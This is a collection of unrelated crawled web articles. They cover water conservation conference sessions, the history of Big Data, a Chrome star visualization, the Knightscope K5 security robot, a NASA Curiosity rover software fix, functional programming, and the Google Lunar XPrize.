water resources become more scarce and unreliable. Ken Baerenklau, UC Riverside & Tim Barr, Western Municipal Water District Ken Baerenklau will present the results of a study conducted at UC Riverside that examined the effects of switching from uniform to budget-based rates in the Eastern Municipal Water District of Southern California. The study utilized ten years of monthly water bills for 12,000 customers in EMWD’s service area to calibrate a household water demand model and then estimate the effects of the budget-based rate structure on water demand after controlling for average price level, weather, and income. The rate structure appears to have reduced demand by 10-15% primarily by causing previously inefficient households to become more efficient. The second presentation, by Tim Barr, Western’s Deputy Director of Water Resources, will outline the Western Municipal Water District implementation of a water budget-based rate structure for its retail water customers. Western’s unique approach uses real-time, microzone-specific, evapotranspiration data and modified monthly turfgrass coefficients from UC research to calculate accurate landscape water budgets on a daily basis. Western’s finance and water efficiency staff collaborated with rate and horticultural consultants to develop a structure that safeguards the financial integrity of the District, provides each unique customer with the water they need, and sends appropriate pricing signals based on efficient water use with every water service bill. In 2015, Western linked the rate structure and the District’s shortage contingency program in anticipation of reduced water supplies due to statewide drought. Michelle Maddaus, Maddaus Water Management; Marty Laporte, Stanford; Amin Delagah, PG&E Food Service Technology Center The Stanford University water conservation project is a collaboration between Stanford and FishNick and it all started at the 2014 Annual PG&E water showcase! The goal of this project is to establish baseline water and energy use for old dishwashers in large kitchens and also to identify operational changes that can easily be implemented to improve efficiency of water and energy use by kitchen staff. In our presentation we will review: elements needed for setting up this project, site selection, and analysis of metering and temperature data from the old and new dishwasher and kitchen processes in a large university kitchen. The data collected by FishNick is used to establish the baseline water and energy use for old inefficient equipment. By reviewing the kitchen operations and understanding staff needs and actions, additional kitchen equipment, maintenance, and efficiency improvements will be implemented. Comparing the water and energy use for the baseline conditions with consumption after the new equipment and processes are in place, helps quantify the potential for water and energy savings and a simple payback for equipment costs. California Bay Area weather is some of the most difficult to predict across the United States due to microclimates and complex topography, yet the National Weather Service and emergency management agencies seldom are required to issue severe weather-related warnings. When moisture deficit is not on everyone’s minds, California weather is like a soldier’s life: 99% boredom and 1% panic. Infrequent so-called ‘atmospheric river’ events are the primary driver behind flooding-related hazards along the central CA coast and Bay Area, and also play a leading role in our state’s water supply. In contrast, during times of water shortage, the forecasting challenges remain while the continual emergency of drought persists over years. The National Weather Service, as part of NOAA, implements a Hydrology Program at a local level for water-related decision support and teams with other local, regional, and national resource agencies to provide information pertaining to both flooding and drought. This presentation will provide an introduction to the National Weather Service: where we’re located, what we do, and how we partner with agencies, the media, and our customer base (local citizens). We’ll also discuss how both flooding and drought are monitored and predicted, and what data and tools are publicly available that may be used as a catalyst for wise green building design that affords hazard resilience. A modicum of discussion on what the future climate portends for Bay Area water balance will also be provided. Jeremy Sigmon, U.S. Green Building Council; Adrienne Johnson, Stanford University; Jennifer Rosser, Sierra Business Council How actively are California’s green buildings addressing water conservation and management? What can we do to catalyze an even greater focus on the state’s top environmental priority in these buildings? New research reveals insights from 1,300+ LEED-certified buildings in California and offers new approaches to leverage buildings as part of the solution to the current water crisis. Sierra Business Council's Water Energy Nexus Study analyzes the potential to increase energy and water savings by improving the operational efficiency of several small to intermediate sized, Sierra foothill water agencies/districts with a focus on minimizing water losses and improving pumping efficiency. Michael Hazinski, East Bay MUD; Eileen Kelly, Dig Your Garden Landscape Design; Jodie Sheffield, Delta Bluegrass Eileen Kelly, Dig Your Garden Landscape Design, will discuss a variety of landscape design alternatives to replace or minimize the traditional lawn such as no-mow grasses, hardscape materials (gravel, decomposed granite, natural stone, boulders, mulch, and sculpture), and eco-friendly strategies such as “sheet mulching” to quickly eradicate the lawn. For over ten years, East Bay Municipal Utility District has offered rebates for converting ornamental lawn to sustainable landscaping. Hear Michael Hazinski provide a water utility perspective on the trends in consumer acceptance of sustainable landscaping and a comprehensive approach to implementing landscape water conservation incentives. Jodie Sheffield, Sod Development Expert from Delta Bluegrass Company will introduce you to their water saving California Native Sod products. The presentation and discussion will focus on: how to choose the right native sod for your project, water wise irrigation management, and how to maintain native sod. Peter MacDonagh, Kestrel Design Group/University of Minnesota Stormwater professionals have been studying stormwater control measures for decades, and foresters have been studying and growing urban trees for centuries. But the practice of combining the two to use trees as a Stormwater Control Measure is in its infancy. Recent results showing water quality benefits for urban tree/soil systems equal to and surpassing that of many traditional bioretention systems will be presented. As research is rapidly discovering ways to enhance performance of bioretention and urban tree/soil systems, this presentation will also highlight some of the most promising new developments, such as, for example, use of various soil amendments to enhance water quality performance, as well as design strategies to maximize stormwater volume and water quality benefits. Brent Bucknum, Hyphae Design Laboratory and Urban Biofilter & Janice Nicol, Office of Cheryl Barton This session will showcase the work of two innovative Bay Area design firms and demonstrate water conservation strategies at a range of scales-from broad-level planning and analysis through detailed landscape design and construction. We will look at recently completed projects as case studies for watershed management solutions that are at once beautiful and functional, and provide quantifiable benefits demonstrating water reduction, cost savings, and ecological improvements. Results from original research and prototype testing will be shared. Implementation strategies include stormwater management, plant and material selection, greywater systems, living roofs, water recycling, and irrigation best practices. Laura Allen, Greywater Action & Sherry Bryan, Ecology Action How does long-term use of greywater affect the soil? Do households reduce water consumption after installing a greywater system? How much maintenance is required? Find out the results of a comprehensive study of 83 greywater systems in California. We monitored the effects of greywater systems on soil, plant health, quality of irrigation water, household water consumption, as well as user satisfaction and maintenance. We will offer recommendations for future system design and installation based on the results of the study. This panel presentation will explore recently-completed work by Affiliated Engineers Inc. and Sherwood Design Engineers with a focus on projects at large institutions including Stanford University and UC Berkeley. Panelists will establish that water use reduction is cost effective even in locations without drought conditions and with moderately priced water and sewer services. Panelists will also prove the viability of water-focused ecodistricts and acknowledge that client commitment to long-term water sustainability, backed by sound economics, can guide future development. Case study examples will include university campus projects, a research building, a hospital and a former Marine Corps Air Station. Jullie Oritz, San Francisco; Deborah Elliott, Napa County; Chris Dundon, Contra Costa; Richard Harris, EBMUD; Robyn Navarra Many consider the current drought in California the worst since precipitation record keeping began over a hundred years ago. With the federal government declaring 27 California counties as “Natural Disaster Areas”, water districts are in a crisis mode. This panel discussion will include presentations by some of the largest and most progressive water utilities in Northern California: Contra Costa Water District, East Bay Municipal Utility District, Napa County, San Francisco Public Utilities Commission and Zone 7 Water Agency. Each panelist will describe the water supply outlook for their district and outline the key activities they are pursuing to reduce water use. Humans have been concerned over water and water supplies since agriculture and stock raising began some 10,000 years ago. What do we know about about droughts in the past and how did ancient societies handle them? Brian Fagan, an archaeologist, looks at examples from western North America and describes what we know about medieval droughts in California and their relevance to today’s water concerns. In what ways are we more vulnerable than those who lived through California droughts a thousand years ago? What fundamental differences are there between human relationships with water in the past and today? Heather Cooley, Pacific Institute; Karen Koppett, Santa Clara; Sam Newman, PG&E; Kari Binley, PG&E; Amin Delagah, PG&E Food Coordinating water-energy efficiency efforts provide a significant opportunity to achieve greater savings for both water and energy utilities. In particular, jointly run end-use water and energy efficiency programs have a huge potential to save energy and water at the home and at the supply source. Yet, coordinated programs face a number of challenges. In this panel, we will describe some of these challenges and how to overcome them. Panelists will include a researcher, a water specialist who has worked on the “Watts to Water” program and PG&E program managers for agricultural irrigation, clothes washers, and commercial kitchens. Julie Ortiz, SFPUC; Richard Harris, EBMUD; Bill McDonnell, Metropolitan Water District; Chris Dundon, Contra Costa Water Dist This session was conceived as a way to acknowledge the 10th anniversary of the Water Conservation Showcase and will be structured as a panel discussion. The intention of the session is to take a quick look back at the status of water conservation from ten years ago when the first showcase was held, consider some of the most successful conservation efforts that are active today and explore how utilities will address water management in the future. The presentation will focus on current and emerging approaches toward providing water management services and tools to assist water customers in managing their own water use. These tools are applicable to existing customers as well as new development to maximize cost-effective water efficiency benefits. The panelists are from four of the most innovative and ambitious water utilities in California: Julie Ortiz of the San Francisco Public Utilities Commission (SFPUC), Richard Harris of the East Bay Municipal Utility District (EBMUD), Bill McDonald of the Metropolitan Water District, and Chris Dundon of the Contra Costa Water District. Each panelist will provide a brief presentation on their perspective of the past, present and future of water conservation. The bulk of the session will be set aside for what promises to be a lively discussion. Dr. Juliet Christian-Smith, Senior Research Associate, Pacific Institute It is zero hour for a new US water policy! At a time when many countries are adopting new national approaches to water management, the United States still has no cohesive federal policy, and water-related authorities are dispersed across more than 30 agencies. Here, at last, is a vision for what we as a nation need to do to manage our most vital resource. In this book, leading thinkers at world-class water research institution the Pacific Institute present clear and readable analysis and recommendations for a new federal water policy to confront our national and global challenges at a critical time. What exactly is at stake? In the 21st century, pressures on water resources in the United States are growing and conflicts among water users are worsening. Communities continue to struggle to meet water quality standards and to ensure that safe drinking water is available for all. And new challenges are arising as climate change and extreme events worsen, new water quality threats materialize, and financial constraints grow. Yet the United States has not stepped up with adequate leadership to address these problems. The inability of national policymakers to safeguard our water makes the United States increasingly vulnerable to serious disruptions of something most of us take for granted: affordable, reliable, and safe water. This book provides an independent assessment of water issues and water management in the United States, addressing emerging and persistent water challenges from the perspectives of science, public policy, environmental justice, economics, and law. With fascinating case studies and first-person accounts of what helps and hinders good water management, this is a clear-eyed look at what we need for a 21st century U.S. water policy. Jon Gray, Principal & Senior Plumbing Engineer, Interface Engineering & Jeffrey Miller, Miller Company Landscape Architects This session will focus on the completed projects of two design firms. These case studies will highlight the innovative solutions that both firms deploy in their efforts to reduce fresh water use and waste-water run-off. The panelists are Lisa Petterson of SERA Architects Inc. and Jeffrey Miller of Miller Company Landscape Architects. The specific projects they will present are described below. Each panelist will share how water conservation measures where achieved in their projects, the measured impact of these solutions and lessons-learned that impacted their future work. The session will end with questions from attendees. In 2008, SERA Architects was commissioned to design a high-rise multi-family development to meet the then newly released Living Building Challenge Standard. The team recognized that Net Zero Water would be particularly challenging due to the water needs of a residential building. We applied for a grant to identify regulatory barriers project teams would face when creating Living Buildings. In the undertaking, we found ourselves doing more than just identifying barriers. Ultimately the team’s work resulted in passage of three alternate methods to the state building code and a house bill which legalized the use of rainwater and graywater in Oregon. As a result of these policy changes, the team is celebrating completion of one of the largest rainwater collection projects in Oregon and is now designing what will be one of the largest rainwater-to-potable systems ever built. Miller Company Landscape Architects is an award-winning landscape architecture firm located in San Francisco. Case study projects illustrated in this presentation include over 20 green school yards the firm has designed and built in San Francisco. These projects include independent and public schools commissioned by SFUSD, SFPUC and include edible and native gardens, rainwater catchment systems and educational components. Rachel Young, ACEEE; M. Lorraine White, GEI Consulting; Joe Castro, City of Boulder; Leslie Larocque, McKinstry The first portion of the session will be a presentation of the results of a joint ACEEE/AWE Report, Tackling the Nexus: Exemplary Programs that Save Both Energy and Water, which identifies and recognizes the most successful programs that seek both energy and water savings, and chronicles these programs so that others can learn from them. The results of this research include case studies of each award winning programs and an overall synthesis and discussion of the research, including key common characteristics of the best practice programs, recommendations for successful programs, and useful lessons learned. It presents best practice ideas and lessons learned for next-generation customer energy and water efficiency programs, along with concrete examples of successful program implementation. This session will cover the water-energy nexus, the methodology of the report, the winning programs and best practice results and challenges discovered from the research. The second portion of the session will be presented by Joe Castro. Joe is one of the winning program administrators and will present on the details of his program, The City of Boulder Colorado's Energy Performance Contracting Program, including the motivation for creating the program, program design, program performance and lessons learned. The third portion of the session will be presented by Loraine White. Loraine was an expert panelist and helped determine the winning programs that were included in the report described above. Loraine will speak to the water-energy nexus in greater detail and draw on her years of work in this field and expertise. Generating electricity requires significant quantities of water, primarily for cooling. This demand can be particularly challenging at a local level representing in many cases a community’s single largest consumer. In addition, wastewater from these facilities can have a significant impact on water quality within a region as well. Since 2003, the California Energy Commission evaluated new power plant proposals based on policies that encourage the use of degraded water supplies rather than fresh water by power facilities and where feasible, use zero liquid discharge systems to eliminate wastewater impacts. In addition, efforts to significantly increase the efficiency of water used by power facilities as resulted in significant reductions in overall water demand by new facilities as compared to older plants. This course will explore the water dependencies and efficiency opportunities associated with power plants and the policies that now govern this relationship in California. Matthew Passmore, Rebar (moderator); Charles Brucker, PLACE Studio; Jennifer Easton, City of San Jose; Linda Wysong, PNCA From the beginning, water has been at the center of our lives. We choose to live by it, harness its energy, and certainly depend upon it for sustenance. Historically we collect our stormwater and whisk it away in the most expedient and efficient manner never stopping to consider its ability to make additional contributions. Over the last few decades and with increasing frequency, stormwater has been treated as the important resource it presents. Designers and artists, together with engineers and agencies are looking to celebrate stormwater’s presence in our communities through creative expression, interpretation, and the visible additions of green infrastructure. There are inspiring examples from around the world to motivate us to join efforts with our colleagues and our communities to make an impact and to celebrate water. Water and energy are quickly becoming some of the world’s most valuable and sought after commodities. These webcasts will feature live presentations by scientists, academics, and business leaders addressing the increasingly important issue of energy and water management. For businesses, efficiency will cut costs and promote environmental awareness, and for all, this summit will provide insight into best practices, tips, case studies, and solutions for responsible resource and facility management. Growing Enough Food Without Enough WaterDr. David Molden, Deputy Director General for Research, International Water Management Institute[[ webcastStartDate * 1000 | amDateFormat: 'MMM D YYYY h:mm a' ]]36 mins
<urn:uuid:aafc9cb8-affb-491e-97b2-9aefe37df1f3>
CC-MAIN-2017-09
https://www.brighttalk.com/webcast/693/20597
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00539-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934114
4,728
3.140625
3
What’s the ‘big’ deal? The past, present and future of Big Data This feature first appeared in the Spring 2015 issue of Certification Magazine. Click here to get your own print or digital copy. Big Data. It’s a buzz phrase, a marketing term, an IT framework and an employment category. That’s a heavy load for two words to carry, but Big Data is all about dealing with large burdens. The need to wrangle large datasets has been around for decades, particularly in the theoretical science and engineering communities. Why then has Big Data only recently become a major IT industry phenomenon? Put simply, Big Data couldn’t exist until the technology that made it possible became widely available and affordable to those who could benefit from it. Once that happened, it was just a matter of showing these organizations what Big Data was (and wasn’t), and how they could use it to achieve greater success. Big Data is very new, but there are already a couple of developments on the horizon that will fundamentally change what Big Data is, and who will (or won’t) be employed in its specialty. A Brief History Lesson Back in the 1960s and ’70s, very large datasets could only be processed using supercomputers — monster machines manufactured by companies like Cray Research and IBM. Supercomputers were wildly expensive to house, operate, and maintain, putting them out of the price range of most organizations. This resulted in a limited number of supercomputers in the world — with any number of government departments, corporations and universities all fighting each other to get access to processing time on the few models out there. While supercomputer price tags would become more reasonable as time passed, they remained very expensive to own and operate, keeping them out of reach for several groups that could have benefitted from their use. In 1994, a pair of NASA computer scientists figured out how to connect a group of regular PCs (often referred to as commodity hardware) so that they could perform the same massive parallel processing as a supercomputer. This was the first “Beowulf cluster,” and it was a total game changer for power computing. A Beowulf cluster consists of a local area network made up of standard PC clients, each client running a UNIX-based operating system and additional software that enables it to share processing duties with every other client in the network. This combination of inexpensive hardware and open source software made it possible to create a supercomputing system at a fraction of the cost. Traditional supercomputers would slowly drop in price as time passed. In 2008, Cray Research and Microsoft released the CX1, a “personal supercomputer” with a relatively inexpensive $25,000 price tag. The CX1 offered a very viable supercomputing option for organizations with smaller budgets. One big piece of the Big Data puzzle was the creation of Apache Hadoop in 2005. Hadoop is an open source software platform used to work with massive data sets distributed across multiple commodity servers. Hadoop works particularly well when dealing with a mix of structured and complex data. All of these developments contributed to the creation of what we now call Big Data. But how did Big Data become a successful IT industry specialty? Turning Big Data into Big Money Turning raw data into information is not a new challenge — businesses and governments have been performing this trick for decades. What Big Data fundamentally improved are these key elements: ● The amount of data than can be worked with ● The sophistication of the analysis that can be performed ● The accuracy of the information produced ● The cost of the required infrastructure As noted earlier, the rush to get involved in Big Data was sparked by the technology that made it possible. In order to truly take off, however, Big Data had to be turned into a product that could be sold to large corporations and other potential clients. Big Data was given market legitimacy by industry powerhouses like IBM, SAP, Cloudera, Microsoft and Amazon Web Services. These and other vendors created the value proposition behind the Big Data buzz, turning it into a product that could be understood by potential buyers. Big Data adoption was helped greatly by the technology wave that preceded it: cloud computing. The concepts and benefits of cloud computing had already been accepted by several industries by the time that Big Data really began to gain traction. For many organizations, the addition of Big Data was a natural extension of their existing cloud computing services. Obviously, for Big Data to be beneficial, you need to have … well, big data. As it is, more data is generated and captured in today’s world than at any other time in history. The mobile computing boom in particular has created a massive data collecting engine that captures multiple events from our daily lives. A smartphone creates new data points every second that it’s powered on. This mobile data honeypot will grow larger from the nascent wearables market. Smartwatches, fitness bands, health monitors and other small devices that track what their owners are doing and where they are doing it, are growing in popularity. The wearables market will likely see a huge boost from the recent release of Apple’s Watch. Then, there is the so-called Internet of Things, also known as the Internet of Everything. As more everyday objects become internet-enabled, they will all be adding more data into the mix. All of this activity is generating a huge glut of gigabytes for Big Data specialists to spin into gold, or possibly Bitcoin. But, where have today’s Big Data specialists come from? Big Data Miners The growth of Big Data has resulted in the evolution of one or more traditional IT industry job roles. While the job titles have changed, the Big Data job descriptions are similar to those of their more familiar counterparts, but with a few important tweaks. One new Big Data job role is that of data scientist. Now, if you were to compare a data scientist to a traditional data analyst, you would not be totally off the mark. Both roles require a deep knowledge of mathematics, statistics, computer modeling and analytics. The data scientist role, however, has some upgraded responsibilities. Data scientists are expected to have high levels of business acumen, the better to help them focus on the most strategically important questions an organization has. Data scientists must also be able to effectively communicate with business executives and department leaders, using the information they’ve generated to recommend specific courses of action. Some companies using Big Data have gone a step further and created a new C-level position: the Chief Analytics Officer. This business executive has responsibility for all actions taken based on the recommendations of the data scientist(s) working under them. As with other technology frameworks, Big Data requires a number of software developers and hardware experts to provide support. Hadoop developers are currently in demand on job boards. Organizations that want to host their own Big Data solution need to have hardware engineers and support technicians who are knowledgeable in Big Data clustering infrastructure. Bold predictions for Big Data Is Big Data here to stay? Yes and no. There are two significant factors that will come into play in the not-too-distant future, which will change how Big Data exists today. In the short term, Big Data is going to continue to make its presence felt in a growing number of industries. Big Data’s relatively low cost has already empowered many smaller scientific institutions around the world, who can do complex analyses of huge data sets without breaking their modest budgets. The same can be said for startups — new businesses created with limited personal or venture capital will be able to get their hands on Big Data tools for a fraction of the cost of traditional supercomputing. So, how will Big Data change in the near future? First of all, Big Data will become just Data. As a growing number of people generate greater amounts of data, and as the related technology continues to become less expensive and more accessible, the distinction between Big Data and “regular” data management systems will fade. In particular, some Big Data tools will end up as consumer-level products. We are already seeing the early stages of this in the personal health tracking industry, where a fitness band and a smartphone can automatically collect a number of vital statistics in real-time, and then perform rudimentary trend analysis on the entire data collection. A second important development is that the next wave of data scientists, will be machines. The extremely young data scientist job role is very likely already on the path to automation. Many of the duties of the data scientist — trend analysis and prediction, for example — will be performed quicker, cheaper and better by future versions of existing Big Data tools. The growing power and sophistication of computer algorithms and machine intelligence will eventually outstrip enough of the data scientist’s capabilities to make them obsolete. This isn’t to say that you shouldn’t pursue a career as a data scientist … as long as you know that it could end up with you configuring the software that is about to replace you.
<urn:uuid:83d750cc-a560-483e-8b4f-6e040db94ce6>
CC-MAIN-2017-09
http://certmag.com/whats-big-deal-past-present-future-big-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00239-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958219
1,872
2.921875
3
A new Google Chrome workshop virtually reproduces 100,000 nearby stars in just one tab in your web browser. The term "nearby" in this context being relative, of course. The visualization can be accessed here, and it's a really effective gateway to procrastination. You can zoom in past Barnard's Star or Alpha Cassiopeiae on your way to the Sun. Or you can click the discreet "take a tour" icon in the top right corner of the screen for an educational presentation that begins with the Sun and then pans out, putting everything in perspective, such as the actual distance of the Voyager-1 from Earth or the proximity of other stars to the Sun. And it's all done with some eery music playing in the background, of course. Google credits Wikipedia for the star renderings and for images of the galaxy, along with several observatories. Images of the Sun were provided by NASA and several other science teams, while researchers and agencies from across the world chipped in data on the stars. Oh, and if you recognize the music, then you must have played Mass Effect; Google tapped Sam Hulick, who scored the video game, for the accompanying soundtrack, which, while perfectly ominous for the scene it accompanies, can get to be a little much for those who keep the tab open for too long while trying to write a blog post about it. As I mentioned, it's a great, almost literal escape for the middle of the workday. But for those who would nitpick the project for accuracy, Google was one step ahead with a disclaimer: Warning: Scientific accuracy is not guaranteed. Please do not use this visualization for interstellar navigation.
<urn:uuid:be7e5aeb-7a8f-43c0-9f16-2b1c84e49b98>
CC-MAIN-2017-09
http://www.networkworld.com/article/2223504/opensource-subnet/google-reproduces-100-000-stars-in-chrome-experiment.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00535-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939937
344
2.921875
3
Robots are essentially a self-contained tribute to the wonders of technology. The most advanced models use fast computer processing, high-definition cameras, artificial intelligence and long-range sensors, all of which give you a pretty good idea where technology is heading. In some ways, a robot even provides a glimmer of the future car and future IT advances. The components for a robot are all housed on one intelligent machine that connects back to a server over a high-speed network. When deployed, a robot must be engineered to act autonomously. Any flaws in the programming lead to serious repercussions. Knightscope is a Silicon Valley startup working on the K5 surveillance robot. Intended to help police forces in urban areas, at shopping malls or the parking lot of Google, the robot is one of the best examples of how autonomous helpers can augment the efforts of human security personnel. Stacy Stephens, the co-founder of Knightscope, offers some insight into how it works and how it could be used. Robots Can Guard a Designated Area The K5 looks a bit like the Robby the Robot from Forbidden Planet fame. Both have a coned head and stand about as tall as a human. (The K5 is 5 feet tall; Robby the Robot stands 7 feet tall.) The imposing look is by design. The K5 is intended to be the most critical part of what Stephens calls the "use of force continuum" -- that is, a commanding presence. [ Analysis: Will This Robot Make America Safer? ] To stay within an area, security personnel use mapping software to create a geo-fenced perimeter. The K5 then moves autonomously (up to 3 miles per hour) and detects objects using two Light Detection and Ranging (LIDAR) sensors, which emit a laser in a 270-degree sweep every 25 milliseconds around the robot. The K5 creates a point cloud, such as a 3-D image of the surroundings showing the objects within the geo-fenced area. Unlike the GPS in your smartphone, which finds locations within a few meters from you, the K5 uses a differential GPS that finds objects within a few centimeters. That helps the robot know exactly where it's moving at all times. There's also an ultrasonic sensor for detecting objects close to the robot and a "wheel odometry" sensor to track the motion of its wheels. Robots Can Monitor the Grounds If a company deploys the K5 robot in a parking lot, one primary function is recording suspicious activity. To help, four HD video cameras can monitor and record in a 360-degree circle around the robot. Crucially, the K5 doesn't just mindlessly record activity. If there's a trigger, such as unusual or sudden movement, the K5 will record a video clip, stamp it with the GPS coordinates and alert the security guards. The K5 can scan 300 license plates per minute. In the Knightscope Security Operations Center, the security guards or the police force receive an immediate alert if the K5 detects a license for a known criminal. They can even inspect how the robots optical-character recognition system identified the plate, making sure there's a match. Since the K5 can work over a 24-hour period, infrared and thermal imaging sensors detect objects at night. The K5 isn't solely for surveillance: If someone walks up to the robot in a parking lot, he or she can press a button to talk to a human security guard. (There's no two-way video chat system, but that could be added to a future version.) Robots Can Listen to Social Media Chatter One interesting feature on the K5 is the capability to compare real-time events detected with video cameras and motion sensors with social media chatter. Stephens says the impetus to adding this feature was the Boston Marathon bombings, when citizens took to social media to help law enforcement track the suspects. The K5 can "listen" for hashtags, keywords and other information and compare it to nearby objects and video feeds in a given area. For example, if the K5 patrols a parking lot late at night and detects a moving car, the robot can search Twitter for reports of a stolen car. The robot can even detect the license plate and then search for known criminals. The social media monitoring can be restricted to a specific location, since many Twitter posts include geo-location data. Robots Can Think on Their Own The Knightscope is a good example of how artificial intelligence is advancing. Stephens says the robot can learn over time. In a parking lot, the K5 might detect normal movements at certain times of the day, such as 5 p.m. when people leave work, and then determine that movement at 3 a.m. looks suspicious. The K5 also knows the movements of humans walking to a car or carrying packages but can detect when someone's crouching down next to a passenger door. The K5 can also listen for audio clues. Normal sounds throughout the day fall within a certain range of 80 to 90 decibels; if the sounds suddenly spike to more than 100dB, the K5 would alert security guards about a possible gunshot or explosion. Thermal imaging helps, too: The robot might learn that there was a loud sound followed by a bright glare from an explosion, or infrared cameras might detect movement in an area of a parking structure that has never shown movement before. Robots Can Protect Themselves Having a robot patrol a parking lot can deter intruders. But what if criminals try to tamper with the K5? Stephens says the robot is equipped with safety sensors to avoid collisions. If someone walks up to the robot, the K5 will initially stop and then move around that person. If the person keeps trying to confront the robot, it emits a mild warning chime and flash lights. If someone still tries to tamper with the robot, it can continue walking away and alert the security guards or police. However, if someone tries pushing the robot or removing a camera, the K5 can emit a piercing alarm to immobilize someone determined to cause damage. In most cases, by the time someone has approached the robot, the K5 has already reported the suspicious activity and alerted the police or campus security. This story, "5 Uses for the Surveillance Robot of Tomorrow" was originally published by CIO.
<urn:uuid:2ce7c2e8-3219-4b05-a251-a513ae9fc326>
CC-MAIN-2017-09
http://www.computerworld.com/article/2491135/data-center/5-uses-for-the-surveillance-robot-of-tomorrow.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174159.38/warc/CC-MAIN-20170219104614-00111-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929102
1,302
3.203125
3
NASA engineers updated the software for a robotic Mars rover, correcting a computer glitch more than two months old while the robot hurtled through space on its way to Mars. Late in November, NASA launched its $2.5 billion Mars Science Laboratory. Dubbed Curiosity, the SUV-size super rover is on an eight-month journey to Mars with a mission to help scientists learn whether life can exist, or has ever existed, on the Red Planet. However, a problem caused a computer reset on the rover Nov. 29, three days after the launch, NASA reported last week. The problem was due to a cache access error in the memory management unit of the rover's computer processor, a RAD750 from BAE Systems. "Good detective work on understanding why the reset occurred has yielded a way to prevent it from occurring again," said Mars Science Laboratory Deputy Project Manager Richard Cook, in a statement. "The successful resolution of this problem was the outcome of productive teamwork by engineers at the computer manufacturer and [NASA's Jet Propulsion Laboratory]." Guy Webster, a spokesman for the JPL, told Computerworld that because of the processor glitch, the rover's ground team was unable to use the craft's star scanner, which is designed for celestial navigation. That technology was not in use for several months, and NASA engineers had to guide the rover through one major trajectory adjustment using alternate means, according to Webster. The fix, which was uploaded to the rover as it traveled through space, changed the configuration of unused data-holding locations, called registers. NASA reported that engineers confirmed this week that the fix was successful and that the star scanner is working again. Curiosity, equipped with 10 science instruments, is expected to land on Mars in August. The super rover is set to join the rover Opportunity, which has been working on Mars for more than six years. Opportunity has been working alone since a second rover, Spirit, stopped functioning last year. Curiosity will collect soil and rock samples, and analyze them for evidence that the area has, or ever had, environmental conditions favorable to microbial life. Curiosity weighs one ton and is twice as long as and five times heavier than its predecessors. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed . Her email address is email@example.com.
<urn:uuid:346e9134-65cd-4613-b0ac-d664659b05c2>
CC-MAIN-2017-09
http://www.computerworld.com/article/2501681/emerging-technology/nasa-fixes-computer-glitch-on-robot-traveling-to-mars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00580-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955154
510
2.90625
3
Meanwhile, the discussion also broke down to the benefits of functional programming versus imperative programming. Functional programming is a programming paradigm that treats computation as the evaluation of mathematical functions and avoids state and mutable data. It emphasizes the application of functions, in contrast to the imperative programming style, which emphasizes changes in state. The difference between a mathematical function and the notion of a "function" used in imperative programming is that imperative functions can have side effects, changing the value of program state. A key tenet of functional programming is the concept of immutability. In functional programming, an immutable object is an object whose state cannot be modified after it is created.
<urn:uuid:d02256a1-9729-4add-a75e-35bf676efd88>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Application-Development/Is-it-Time-for-JavaScript-to-Step-Aside-for-the-Next-Big-Web-Thing-109707/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00280-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947482
130
3.6875
4
There’s a team from Spain, and another from Italy. The Japanese team calls itself Hakuta, and there are numerous teams from the U.S. They’re working hard with a serious sense of competition. But they’re not getting ready for the winter Olympics in Sochi. It’s T-minus 23 months for the international assortment of scientists and their sponsors who are literally shooting for the moon in Google’s Lunar XPrize Challenge. The goal is to successfully launch an unmanned spacecraft, land it on the lunar surface and send back high-definition images, in exchange for a $30 million prize from the technology giant and its cosponsors, which include aerodynamic firm Northrup Grumman, phone giant Nokia, and chipmaker Qualcomm. The mission must be accomplished by the end of 2015 to win the grand prize. Not About The Money Many, if not all the groups will spend more than the $30 million to get off the ground, but it’s not about the money. For some, it’s a matter of national pride: only the three major superpowers, the U.S., Russia and China have so far reached the moon. Others are hoping to develop new technology and ignite new enthusiasm about space exploration, just as the U.S. Apollo missions of the 1960s and 1970s did. The last U.S. lunar landing was Apollo 17 in 1972, and the Russians landed an unmanned craft the following year. China is currently most active, with a six-wheeled robotic moon rover named Jade Rabbit roaming the lunar landscape. The Yutu rover began its mission in December, marking the first moon landing by a space probe in 37 years. Inspiring Radical Breakthroughs The XPrize Foundation’s goal, according to its Web site is to promote “radical breakthroughs for the benefit of humanity, thereby inspiring the formation of new industries and the revitalization of markets that are currently stuck due to existing failures or a commonly held belief that a solution is not possible.” In addition to the grand prize for the first lunar landing, the XPrize will award $5 million for second place as well as bonuses for reaching the Apollo 11 module landing site, surviving a lunar night, and for exploring lunar artifacts. Rules say 90 percent of the funding must come from private rather than government sources, and Google expects some teams will spend as much as $100 million to win the contest. But others are looking to reduce their costs by deploying commercial payloads on the way to the moon. Complex Engineering Task Israel’s team, SpaceIL, is cutting its costs through innovation. Rather than develop an expensive rover to accomplish the goal of traveling 500 meters (1,620 feet), its 300-pound spacecraft is being designed to land once, then fire up its rockets again to take some aerial pictures and land the required distance away. “For every pound of rover I need four pounds of propulsion to get it there,” Daniel Saar, director of business development for the Israeli team told us. Trying to find the spot where Neil Armstrong left his footprints will be almost as big a challenge as the landing, he said. “There is no GPS on the moon,” said Saat. “We have to use a NASA database of images.” The project will also draw from Israel’s defense establishment, borrowing from satellite technology deployed by Israel Aerospace Industries, a government-owned agency. Saat said that his team, which will launch from a site in the U.S. or Russia, hopes to inspire more of Israel’s young people to pursue careers in science by rising to the challenge of doing big things with limited resources. “Landing on the moon is a complex engineering task,” said Saat. “For a tiny budget of $36 million, we want to show the world we can explore outer space and accomplish various missions.”
